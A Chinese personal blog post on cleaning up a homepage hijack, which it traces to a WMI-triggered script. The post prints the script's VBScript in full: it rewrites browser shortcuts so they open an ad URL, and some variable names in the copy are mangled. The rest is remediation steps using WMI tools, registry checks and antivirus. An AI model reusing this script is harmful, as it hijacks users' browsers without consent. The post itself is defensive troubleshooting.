theKingOfNight's Blog

主页被篡改2345或hao123根治

Word count: 1kReading time: 4 min
2019/01/19 Share

前段时间主页被篡改,而且电脑还中了其他不同种类的病毒,已经全面覆盖默认的User+admin权限用户,开机闪屏+自动结束打开任务等等,当时直接注销用户,采用系统保留用户administrater用户登录,然后安装360,重新全盘扫描,但是对于一个安全新手来说,360清理掉了许多可以正常使用的工具,而且许多工具功能也变的残缺,只好重装系统。
昨天电脑在此打开了某客的工具包,电脑直接被恶作剧,不过目前没发现什么大碍,重启后主页被篡改,又不想使用360,只好手动清理。

1
2
3
首先,我中的浏览器
Chrom
firefox

主页被劫持的原理其实就是通过WMI自动运行的脚本,WMI是windows后台运行的事件管理器。

1
2
更改WMI就需要下载
https://arlenluo.github.io./images/post6/WMITools.exe

image.png
然后直接点击okok
image.png
然后右键查看这个的属性
image.png
这里就是幕后黑手
里面的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
On Error Resume Next
Const link = "http://hao934.com/?r=gameall&m=a286"
Const link360 = "http://hao934.com/?r=gameall&m=a286&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Username\Desktop,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
oDic.Add LCase(browser), browser
Next
lnkpathsArr = split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
If fso.FolderExists(oFolder) Then
For Each file In fso.GetFolder(oFolder).Files
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
Set oShellLink = WshShell.CreateShortcut(file.Path)
path = oShellLink.TargetPath
name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
If oDic.Exists(LCase(name)) Then
If LCase(name) = LCase("360se.exe") Then
oDicShellLink.Arguments = link360
Else
oShellLink.Arguments = link
End If
If file.Attributes And 1 Then
fsoile.Attributes = file.Attributes - 1
End If
oShellLink.Save
End If
End If
Next
End If
Next

现在篡改主页的代码大致都是这样。理解起来没什么代难度,不过这个代码写的灰常好,还对360做了特殊处理。

image.png

而且不能直接删除。
需要CD到WMI的安装目录管理员运行wbemeventviewer.exe
然后需要将桌面和开始菜单,快速启动栏中的快捷方式删除

1
2
3
我的桌面和快速启动栏没东西
开始菜单目录
C:\ProgramData\Microsoft\Windows\Start Menu\Programs

image.png

把后面这个去了,应该大部分篡改网页的脚本小子的方式都能去掉。

不过我这边修改完以后界面又跳转到了

1
http://www.2345.com/?36457

继续踩坑
在注册表中的

1
HKEY_CLASSES_ROOT/CLSID /{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command

查看病毒没有更改注册表,(如果有的话双击数据,将后面的链接删掉),当然我这边不是这种情况。

另外一种就是木马了,懒得找,直接使用adwcleaner程序进行清理。

如果清理结束后重新启动后主页仍然是2345,说明肯定是木马了,而且十分有可能是伪装型木马,就算肉眼找到也不会去怀疑的,直接使用现在的杀毒软件就好。
我使用的是360大法宝,当然杀毒软件这个东西杀完毒就卸载,直接采用其中的系统急救箱,强力模式,自定义扫描,清除系统关键位置(C盘),关系的东西记得备份。
有linux子系统和其他安全工具的记得转移

1
2
linux子系统目录
C:\Users\{user namae}\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu16.04onWindows_79rhkp1fndgsc\LocalState\rootfs

至此,主流的主页篡改就这些。
当然嫌弃麻烦的可以直接用360的主页防护+系统急救箱

CATALOG